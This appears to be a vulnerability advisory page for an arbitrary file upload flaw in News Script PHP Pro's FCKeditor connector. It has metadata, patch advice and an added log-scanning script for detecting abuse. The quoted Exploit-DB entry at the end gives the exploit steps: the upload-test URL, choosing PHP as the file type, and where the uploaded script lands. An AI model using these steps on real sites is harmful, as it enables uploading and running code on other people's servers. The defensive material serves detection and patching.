Vendor: News Script PHP Pro
By: Net.Edit0r
CVSS: 7.5 (HIGH)
CWE: 434 (File Upload Vulnerability)
Product Name: News Script PHP Pro
Affected Version From: Full Version
Affected Version To: Full Version
Patch Exists: YES
Related CWE: Web Applications
CPE: newsscriptphp.com
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: linux/php
Year: 2010

News Script PHP Pro (fckeditor) File Upload Vulnerability

A vulnerability in News Script PHP Pro (fckeditor) allows an attacker to upload arbitrary files to the server. The vulnerability exists due to insufficient validation of the file type in the 'uploadtest.html' script. An attacker can upload a malicious file to the server and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the application to the latest version.
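
To check whether an install was abused before patching, access logs can be searched for the two paths this advisory names: the FCKeditor connector directory and the `userfiles` upload target. The following is an added example, not part of the original advisory or the Exploit-DB entry; it assumes Combined Log Format, and the extension list, function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory; everything else below is an assumption.
CONNECTOR = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/userfiles/"
# Extensions a PHP-enabled server may execute (assumed list, extend as needed).
# The trailing (\.|$) also catches double extensions such as "x.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Combined Log Format: ip ident user [time] "METHOD target proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def find_suspect_uploads(lines):
    """Return (ip, target, touched_connector) for every 2xx response that
    served a script-like file from the upload directory. touched_connector
    is True when the same client requested the connector path earlier."""
    touched = set()
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed or non-CLF lines
        ip, _method, target, status = m.groups()
        # Drop the query string, decode %xx escapes, compare case-insensitively.
        path = unquote(target.split("?", 1)[0]).lower()
        if CONNECTOR in path:
            touched.add(ip)
        elif UPLOAD_DIR in path and status.startswith("2"):
            filename = path.rsplit("/", 1)[-1]
            if SCRIPT_EXT.search(filename):
                hits.append((ip, target, ip in touched))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [26/Dec/2010:10:00:01 +0000] "GET /news/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4312',
    '203.0.113.7 - - [26/Dec/2010:10:00:40 +0000] "GET /news/userfiles/test.php HTTP/1.1" 200 120',
    '198.51.100.9 - - [26/Dec/2010:10:01:00 +0000] "GET /news/userfiles/photo.jpg HTTP/1.1" 200 20480',
    '198.51.100.9 - - [26/Dec/2010:10:02:00 +0000] "GET /news/userfiles/notes.PHP.txt HTTP/1.1" 200 64',
    '198.51.100.9 - - [26/Dec/2010:10:03:00 +0000] "GET /news/userfiles/gone.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for ip, target, correlated in find_suspect_uploads(SAMPLE):
        print(ip, target, "connector-then-fetch" if correlated else "script-in-upload-dir")
```

Any hit means a script-like file was served from the upload directory and should be reviewed on disk; hits with the correlation flag set deserve attention first.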

Exploit-DB raw data:

                                
==============================================================================
  
        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
==============================================================================
  
    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
    [»] Script  :           [ News Script PHP Pro  ]
  
    [»] TestedON:           [ linux/php ]
  
    [»] Download:           [ http://newsscriptphp.com/ ]
  
    [»] Author  :           [ Net.Edit0r }
  
    [»] Email   :           [ black.hat.tm@gmail.com ]
  
    [»] Date    :           [ 2010-12-26 ]
   
    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]
  
###########################################################################
  
     
===[ Exploit ]===    ./Iranian HackerZ
  
  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [»] Select the "File Upload" To use = php
 
===[ Upload To ]===
 
  [»] http://server/[patch]/userfiles/Name File
 
===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
 
     BHG : Net.Edit0r ~ Darkcoder ~ keracker
                                   
###########################################################################